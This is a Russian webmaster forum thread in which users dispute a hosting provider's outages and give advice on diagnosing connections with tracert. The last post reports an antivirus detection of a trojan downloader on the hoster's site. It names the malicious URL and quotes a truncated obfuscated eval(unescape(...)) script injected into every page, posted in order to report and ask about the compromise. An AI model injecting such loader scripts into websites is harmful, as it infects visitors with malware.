- Поисковые системы
- Практика оптимизации
- Трафик для сайтов
- Монетизация сайтов
- Сайтостроение
- Социальный Маркетинг
- Общение профессионалов
- Биржа и продажа
- Финансовые объявления
- Работа на постоянной основе
- Сайты - покупка, продажа
- Соцсети: страницы, группы, приложения
- Сайты без доменов
- Трафик, тизерная и баннерная реклама
- Продажа, оценка, регистрация доменов
- Ссылки - обмен, покупка, продажа
- Программы и скрипты
- Размещение статей
- Инфопродукты
- Прочие цифровые товары
- Работа и услуги для вебмастера
- Оптимизация, продвижение и аудит
- Ведение рекламных кампаний
- Услуги в области SMM
- Программирование
- Администрирование серверов и сайтов
- Прокси, ВПН, анонимайзеры, IP
- Платное обучение, вебинары
- Регистрация в каталогах
- Копирайтинг, переводы
- Дизайн
- Usability: консультации и аудит
- Изготовление сайтов
- Наполнение сайтов
- Прочие услуги
- Не про работу

Маркетинг для шоколадной фабрики. На 34% выше средний чек
Через устранение узких мест
Оксана Мамчуева
Стучал ICQ#: 468-655-368 Denis, этот же номер ICQ, у вас на сайте, вверху в правом углу, а внизу, электронная почта поддержки, или вы сами может опубликовали номер ICQ кого-то другого, раз не верите, если это так, то достаточно посмотреть история, и найдёте, не надо из людей делать идиотов
Если вам говорят,что ваш сервер, то надо прежде искать причины у вас, дыма без огня не бывает,
у меня десяток проектов, и все в этот момент работали без проблем, в том числе и по FTP, а один ваш почему-то нет.Конечно тяжело признавать падения и глюки, когда основная задача - набрать клиентов.
Если вам говорят,что ваш сервер, то надо прежде искать причины у вас, дыма без огня не бывает,
у меня десяток проектов, и все в этот момент работали без проблем, в том числе и по FTP, а один ваш почему-то нет.Конечно тяжело признавать падения и глюки, когда основная задача - набрать клиентов.
К примеру я вчера не мог периодически пробиться к одному серверу, но это только потому что РТкомм поставил глючный роутер на заграничные каналы и доступ в датацентр с этими каналами был затруднен.
Таже ситуация может быть и у вас, нужно проверять доступ командой tracert (traceroute в Unix) по IP.
Смотрите где обрывается связь, очень часто бывает что у клиентов не доходит и до выхода на заграницу, а то и до пиринга с другим провайдером, причем это вина канального провайдера.
Если хостер делает предположение, то попробовали бы проверить, т.к. такие предположения строятся на опыте и профессионализме.
Да ситуации бывают разные, согласен, от этого не уйдёшь, но если бы это было бы один раз, мне бы наверное было б понятно, но это было неоднократно, а во вторых, как мне кажется профессионализм в том и заключается, что люди,которые предлагают хостинг, хочется надеяться, что они всё протестировали и проверили, мне то от этого не легче станет, если увеличится пинг или на каком узле не приходит ответ при проверке трассировки маршрута. Мы конечные пользователи, платим деньги не за то,чтобы проверять и тестировать, а хотим получить работающий хостинг и качество.
DLag, А где этот сервер был расположен? Не думаете что в такие моменты нужно иметь VPN на всякий пожарный для экстренного доступа к серверам из другой подсети тк провайдеры по тем или иным причинам иногда друг друга "блочат":)
poststork, при этом надо понимать, что за качество нужно платить...
А если вы платите копейки- то за что заплатили, то и получили:)
ну во-первых, у хостера есть тарифный план, если он его выставляет, значит предполагается, что сайты на нём размещённые будут работать, не так ли, во-вторых "копейки" понятие растяжимое, для кого-то может и 200 у.е. в месяц за хостинг тоже копейки, в-третьих это не аргумент, т.к. здесь речь ведётся о работе хостера, в-четвертых, где уверенность, что сменив тарифный план, вы меняете и сервер?
А зачем вам мои ФИО и мой номер квартиры?
а во вторых, как мне кажется профессионализм в том и заключается, что люди,которые предлагают хостинг, хочется надеяться, что они всё протестировали и проверили, мне то от этого не легче станет, если увеличится пинг или на каком узле не приходит ответ при проверке трассировки маршрута. Мы конечные пользователи, платим деньги не за то,чтобы проверять и тестировать, а хотим получить работающий хостинг и качество.
Немного не понял. Вы хотите от хостера, чтобы он проверял канал от Вашей квартиры до его серверов? Делайте tracert до своего сервера - это будет хорошим аргументом в беседе с провайдером. Загружать же хостера непроверенными жалобами - значит отнимать у него время, которое могло бы пойти на улучшение хостинга и Ваших сайтов в частности.
DLag, А где этот сервер был расположен? Не думаете что в такие моменты нужно иметь VPN на всякий пожарный для экстренного доступа к серверам из другой подсети тк провайдеры по тем или иным причинам иногда друг друга "блочат":)
Мои сервера в Украине, у нас друг друга не блочат, так что не вижу смысла. :)
Этот сервер попросили по дружбе проверить на безопасность и погонять стресс-тесты.
При заходе на сайт Hos-Ting.ru сработал Касперский.
26.06.2008 17:52:38 Вредоносный HTTP-объект <http://kemport.net/gpack/index.php//index>: обнаружено: троянская программа 'Trojan-Downloader.JS.Psyme.abm'.
В начале всех страниц скриптик интересный
<script type="text/javascript">
eval(unescape("%64%6f%63%......%65%27%29%3b"));
</script>
Господа, прошу проверить это где-нибудь по дороге цепляется
или хостер такой забавный?